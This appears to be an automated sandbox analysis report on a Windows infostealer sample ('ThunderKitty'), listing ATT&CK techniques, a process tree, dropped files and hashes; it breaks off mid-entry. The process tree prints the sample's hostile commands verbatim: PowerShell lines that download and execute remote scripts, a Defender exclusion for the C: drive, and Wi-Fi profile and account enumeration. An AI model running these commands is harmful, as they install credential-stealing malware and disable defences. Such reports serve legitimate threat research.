9a324052211fbf111e8ba4e3d71665a221f3c5a475524309bc705ee95310dc65

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/09/2024, 08:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe
Size

14.0MB
MD5

6568b9ffcb8c8d63bd8b066972d3798d
SHA1

5ea2b00be65494475b639c16fa8ab66590175a86
SHA256

9a324052211fbf111e8ba4e3d71665a221f3c5a475524309bc705ee95310dc65
SHA512

0ea1b1b39d110dbabe0e1adacb3eb1b467a333dd8b86ed6ad4ab8aef95478537a810ea3d4b5821579fa67eb2cf112308c1e16b9a744daaf184434ef205ea2186
SSDEEP

196608:LSG4xZcgzl5TDH6KbJLFfI6OB/zIf8ryQ5S:LYxt5/H6KbhFfpOlzIfxA

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	1672	powershell.exe
12	3736	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1672	powershell.exe
3736	powershell.exe
1156	PowerShell.exe
436	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2620	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2708	ARP.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3184	netsh.exe
2352	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4332	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4860	ipconfig.exe
532	ipconfig.exe
4332	NETSTAT.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
436	powershell.exe
1672	powershell.exe
3736	powershell.exe
3736	powershell.exe
1156	PowerShell.exe
1672	powershell.exe
1156	PowerShell.exe
436	powershell.exe
1672	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeDebugPrivilege	1156	PowerShell.exe
Token: 33	5064	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5064	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	1672	powershell.exe
Token: SeSecurityPrivilege	1672	powershell.exe
Token: SeTakeOwnershipPrivilege	1672	powershell.exe
Token: SeLoadDriverPrivilege	1672	powershell.exe
Token: SeSystemProfilePrivilege	1672	powershell.exe
Token: SeSystemtimePrivilege	1672	powershell.exe
Token: SeProfSingleProcessPrivilege	1672	powershell.exe
Token: SeIncBasePriorityPrivilege	1672	powershell.exe
Token: SeCreatePagefilePrivilege	1672	powershell.exe
Token: SeBackupPrivilege	1672	powershell.exe
Token: SeRestorePrivilege	1672	powershell.exe
Token: SeShutdownPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeSystemEnvironmentPrivilege	1672	powershell.exe
Token: SeRemoteShutdownPrivilege	1672	powershell.exe
Token: SeUndockPrivilege	1672	powershell.exe
Token: SeManageVolumePrivilege	1672	powershell.exe
Token: 33	1672	powershell.exe
Token: 34	1672	powershell.exe
Token: 35	1672	powershell.exe
Token: 36	1672	powershell.exe
Token: SeIncreaseQuotaPrivilege	1672	powershell.exe
Token: SeSecurityPrivilege	1672	powershell.exe
Token: SeTakeOwnershipPrivilege	1672	powershell.exe
Token: SeLoadDriverPrivilege	1672	powershell.exe
Token: SeSystemProfilePrivilege	1672	powershell.exe
Token: SeSystemtimePrivilege	1672	powershell.exe
Token: SeProfSingleProcessPrivilege	1672	powershell.exe
Token: SeIncBasePriorityPrivilege	1672	powershell.exe
Token: SeCreatePagefilePrivilege	1672	powershell.exe
Token: SeBackupPrivilege	1672	powershell.exe
Token: SeRestorePrivilege	1672	powershell.exe
Token: SeShutdownPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeSystemEnvironmentPrivilege	1672	powershell.exe
Token: SeRemoteShutdownPrivilege	1672	powershell.exe
Token: SeUndockPrivilege	1672	powershell.exe
Token: SeManageVolumePrivilege	1672	powershell.exe
Token: 33	1672	powershell.exe
Token: 34	1672	powershell.exe
Token: 35	1672	powershell.exe
Token: 36	1672	powershell.exe
Token: SeIncreaseQuotaPrivilege	1672	powershell.exe
Token: SeSecurityPrivilege	1672	powershell.exe
Token: SeTakeOwnershipPrivilege	1672	powershell.exe
Token: SeLoadDriverPrivilege	1672	powershell.exe
Token: SeSystemProfilePrivilege	1672	powershell.exe
Token: SeSystemtimePrivilege	1672	powershell.exe
Token: SeProfSingleProcessPrivilege	1672	powershell.exe
Token: SeIncBasePriorityPrivilege	1672	powershell.exe
Token: SeCreatePagefilePrivilege	1672	powershell.exe
Token: SeBackupPrivilege	1672	powershell.exe
Token: SeRestorePrivilege	1672	powershell.exe
Token: SeShutdownPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeSystemEnvironmentPrivilege	1672	powershell.exe
Token: SeRemoteShutdownPrivilege	1672	powershell.exe
Token: SeUndockPrivilege	1672	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 860 wrote to memory of 1672	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	83
PID 860 wrote to memory of 1672	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	83
PID 860 wrote to memory of 436	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	84
PID 860 wrote to memory of 436	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	84
PID 860 wrote to memory of 652	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	86
PID 860 wrote to memory of 652	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	86
PID 652 wrote to memory of 4836	652	cmd.exe	87
PID 652 wrote to memory of 4836	652	cmd.exe	87
PID 860 wrote to memory of 3736	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	88
PID 860 wrote to memory of 3736	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	88
PID 860 wrote to memory of 1156	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	90
PID 860 wrote to memory of 1156	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	90
PID 860 wrote to memory of 1816	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	89
PID 860 wrote to memory of 1816	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	89
PID 860 wrote to memory of 1056	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	91
PID 860 wrote to memory of 1056	860	2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe	91
PID 1672 wrote to memory of 1432	1672	powershell.exe	92
PID 1672 wrote to memory of 1432	1672	powershell.exe	92
PID 3736 wrote to memory of 1360	3736	powershell.exe	93
PID 3736 wrote to memory of 1360	3736	powershell.exe	93
PID 1360 wrote to memory of 3800	1360	csc.exe	94
PID 1360 wrote to memory of 3800	1360	csc.exe	94
PID 1432 wrote to memory of 2752	1432	csc.exe	95
PID 1432 wrote to memory of 2752	1432	csc.exe	95
PID 1672 wrote to memory of 3184	1672	powershell.exe	97
PID 1672 wrote to memory of 3184	1672	powershell.exe	97
PID 1672 wrote to memory of 3568	1672	powershell.exe	99
PID 1672 wrote to memory of 3568	1672	powershell.exe	99
PID 3568 wrote to memory of 4928	3568	net.exe	100
PID 3568 wrote to memory of 4928	3568	net.exe	100
PID 1672 wrote to memory of 2620	1672	powershell.exe	101
PID 1672 wrote to memory of 2620	1672	powershell.exe	101
PID 1672 wrote to memory of 1752	1672	powershell.exe	104
PID 1672 wrote to memory of 1752	1672	powershell.exe	104
PID 1672 wrote to memory of 2976	1672	powershell.exe	105
PID 1672 wrote to memory of 2976	1672	powershell.exe	105
PID 2976 wrote to memory of 3588	2976	net.exe	106
PID 2976 wrote to memory of 3588	2976	net.exe	106
PID 1672 wrote to memory of 532	1672	powershell.exe	107
PID 1672 wrote to memory of 532	1672	powershell.exe	107
PID 1672 wrote to memory of 2224	1672	powershell.exe	108
PID 1672 wrote to memory of 2224	1672	powershell.exe	108
PID 2224 wrote to memory of 1588	2224	net.exe	109
PID 2224 wrote to memory of 1588	2224	net.exe	109
PID 1672 wrote to memory of 2500	1672	powershell.exe	110
PID 1672 wrote to memory of 2500	1672	powershell.exe	110
PID 1672 wrote to memory of 4332	1672	powershell.exe	112
PID 1672 wrote to memory of 4332	1672	powershell.exe	112
PID 1672 wrote to memory of 4552	1672	powershell.exe	113
PID 1672 wrote to memory of 4552	1672	powershell.exe	113
PID 1672 wrote to memory of 4860	1672	powershell.exe	114
PID 1672 wrote to memory of 4860	1672	powershell.exe	114
PID 1672 wrote to memory of 4224	1672	powershell.exe	115
PID 1672 wrote to memory of 4224	1672	powershell.exe	115
PID 1672 wrote to memory of 2708	1672	powershell.exe	116
PID 1672 wrote to memory of 2708	1672	powershell.exe	116
PID 1672 wrote to memory of 2352	1672	powershell.exe	117
PID 1672 wrote to memory of 2352	1672	powershell.exe	117

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1816	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-18_6568b9ffcb8c8d63bd8b066972d3798d_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bi52oqlb\bi52oqlb.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7BC8.tmp" "c:\Users\Admin\AppData\Local\Temp\bi52oqlb\CSCD09954FBAF9743D397FE331011E22E24.TMP"
      4⤵
      PID:2752
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3184
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:4928
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2620
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1752
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3588
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:532
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1588
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2500
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:4332
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4552
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:4860
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:4224
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:2708
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o2jpqmxw\o2jpqmxw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7BC7.tmp" "c:\Users\Admin\AppData\Local\Temp\o2jpqmxw\CSC927F3F349C694ED4A3AC963D920A7A3.TMP"
      4⤵
      PID:3800
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:1816
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1156
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:1056

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x244 0x338
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67b0a41134410b2b0ad5e01f6966ac1b

SHA1
fe54ad45f0ad2550513048e681ddfa2a47e25a8b

SHA256
d44434e0ea080223e4afa9ed4316cab5805e3d28221df9e8b7e2789a4518faa9

SHA512
efa1f52521bd420657ac5da046b355fc2717f372ebe2fceb4c6e70f26b5a7ec38895131f564b92def508036453669af22262b464c2abfabc664ef4594233e663

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fd9bed4029d8384096b7b50cca5aac9c

SHA1
d93fe3e4884745db9da9be6c3f3c37ccf02f664c

SHA256
c5d5170550a8f39706e5e9606357b63c43f156a7f0e541988c8c75157564c9d4

SHA512
322f223f0090c49417a7b72f6fc0f09038bc12063b58f25c19f86117c3ebb97eae8278cce4699a980ba150a61679d14828adf702bf97a1ec4e7ac7417df4d681

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
afd6e7a16455305d356d7dd4adee87db

SHA1
26e5994cb98904a1335e189c3b7e9b3e1937f0b5

SHA256
fb9b6cb5736230a2650688b9ec7ee73e7a5b86e8fa61888c98a10052205f039b

SHA512
0334ada24fb34f40f00fad1deebd5a4e58ae46ff108ffe0840fef128e990d7f6f5fbb693a9e7092ee2a5ac6839b44d3456e438d400d756885d9f3229536c3bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7BC7.tmp

Filesize
1KB

MD5
45ec0b8c85734e1e015fa0ef13305e60

SHA1
524c2d19c231a369af916eb0f255d3447a603157

SHA256
42cd0e01aa9c266befa01f6a94ae9f78248d4a663642b84a2e15665829233f27

SHA512
62877f71015317bc1edfe17edba20b90af128451eeb27ae87b2178d14cd4ad431345a1125d417e0e93c422d44e216932c55e9106be470e76dbf954d853171cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7BC8.tmp

Filesize
1KB

MD5
9fba18aab8e41b4fff01cfac0588365e

SHA1
b8871c651c339d28069ea75b17065f389965866b

SHA256
3e198d7165f8ac0aebbe6a52d22d1bb3aefebff5a46e8d0c70d4cf66d2246ceb

SHA512
c08eb09e2b64eb68e8757c4e06f82ff73f39e36de394a0d6ef680ff2c96c9dcd75db1bdc00cb8ee17b34e8c7e93211dfcf40d8b825ba094c54cc9d0dd108cfa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
20KB

MD5
f6c600c2d30dfb7a967712ccb5a702ed

SHA1
f90ee5fa458ae316499b2ade0d007bd9dc49638f

SHA256
016d71051ea705a1331d7973d2ed31f484dfc5115807f3d1f94aa9d5e0e28b39

SHA512
21e0a13402904bfd25bdbd74a3e63f5ecb1817e4cb01deb2701af0c631cd430e3ad28555caab23bf162d64bf60ab7e450d719aaaf7cad08521b3d95f7b63f06c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwshxp0f.41r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bi52oqlb\bi52oqlb.dll

Filesize
4KB

MD5
7d331e3851ff3b3aeb6a1c9abcb9eb05

SHA1
8f39aecfbd39d2e7d344100b456479e2997a3996

SHA256
99f17403100b65f51df3b2bd09e8b97b32e0ea78b1f9ec79107d9933b479e8bf

SHA512
35be183907e1a93d8db2ebdab90029e8a0d5bd5e3b1b81fa3f9dbc9c4ceee4940096a4d67796ca6319b42679144569335288db2c8dbd274f9eb7731391463dc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\o2jpqmxw\o2jpqmxw.dll

Filesize
4KB

MD5
d905bbe4ba23a78b25d31d7914452006

SHA1
91502b9ce6fb347df1ac521e7754529149011031

SHA256
dea4b0b4c99b20c522b331f871b3202fb4b5dff1784236d6359db23946b70fd8

SHA512
3f98fa61b79fa2cfa413265ec855c369be11f4c32cf145ca7a2d5a17f3553694e099dd7806e86060babe43e99ab9eef30934ac22155bb44589c72f82ae6b5323

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bi52oqlb\CSCD09954FBAF9743D397FE331011E22E24.TMP

Filesize
652B

MD5
a462325a4e24c7d8e2185a0d628902a9

SHA1
584701716428a18bfb012effb1389f417277d43c

SHA256
a33f69ba126a7342657acada426348689b0da6b45bc45c337acce031bedd5a3d

SHA512
a9a56b66695c898aa57018d2a2f7f7c1a383e9fb97b4f6c6f6360fe90bbac6002bcae41e9b6fdebe9b9424758a542d0d477a2f87a68dab1c81110243528d3b57

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bi52oqlb\bi52oqlb.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bi52oqlb\bi52oqlb.cmdline

Filesize
369B

MD5
8d85af8bd415194e37470136a58c029a

SHA1
b6a956528cf827ae62d2e52d5730fd169ce8cda7

SHA256
ca699d1ddb198ea727d869d0441b3f3d8235d53e05e4ccfc06fb9746b96c637c

SHA512
aee83457b1a09a257e267a034c4c1ffb4be761a72188d72951a6f54b50b44b83964d5a80dcf73dde2557e9746a4048d4b312bc7607ff576798ec5606d641bb5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o2jpqmxw\CSC927F3F349C694ED4A3AC963D920A7A3.TMP

Filesize
652B

MD5
bee66a024178a4ccc0ebd0518b9c3861

SHA1
e7bf9ccc51e53b82430b6eda9c227032b50f9444

SHA256
20dacd07a351646c28af81834a37d0e68864074e39a04ef5a4653b830af2a84f

SHA512
917d1b3a020f1016f82e13d5cc0c9d825a65c5ddd810788f8008747838e419fe328c55058a2310a1c50de336bf4206bef25df11ea78453438c2941a75a8a7149

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o2jpqmxw\o2jpqmxw.cmdline

Filesize
369B

MD5
318382a8d6291f692c55c24aa7d15b88

SHA1
02f76bfa606c430e372921b21f311dc76b43fb45

SHA256
ca85070bf2aa826d82e9a1caf7a6f28123a6aadbab0d518b9935ed4f9b4dd224

SHA512
56de88b659db4b86354fbf6c0f05db80b8d187f7e5aee33c902117ae2449eab713b06c588341b9800acca7e72925adee3b089a1c3eabd02b4b55d84b23d8c2a4

Download Submit
memory/436-0-0x00007FFDDAAF3000-0x00007FFDDAAF5000-memory.dmp

Filesize
8KB

Download
memory/436-14-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/436-10-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/436-78-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/436-7-0x0000029F56D80000-0x0000029F56DA2000-memory.dmp

Filesize
136KB

Download
memory/1672-44-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1672-79-0x0000022AA60C0000-0x0000022AA6866000-memory.dmp

Filesize
7.6MB

Download
memory/1672-87-0x0000022AA5B80000-0x0000022AA5BAA000-memory.dmp

Filesize
168KB

Download
memory/1672-88-0x0000022AA5B80000-0x0000022AA5BA4000-memory.dmp

Filesize
144KB

Download
memory/1672-68-0x0000022AA54A0000-0x0000022AA54A8000-memory.dmp

Filesize
32KB

Download
memory/1672-34-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1672-123-0x0000022AA5B80000-0x0000022AA5B92000-memory.dmp

Filesize
72KB

Download
memory/1672-124-0x0000022AA5B70000-0x0000022AA5B7A000-memory.dmp

Filesize
40KB

Download
memory/1672-24-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
10.8MB

Download
memory/1672-133-0x00007FFDDAAF0000-0x00007FFDDB5B1000-memory.dmp

Filesize
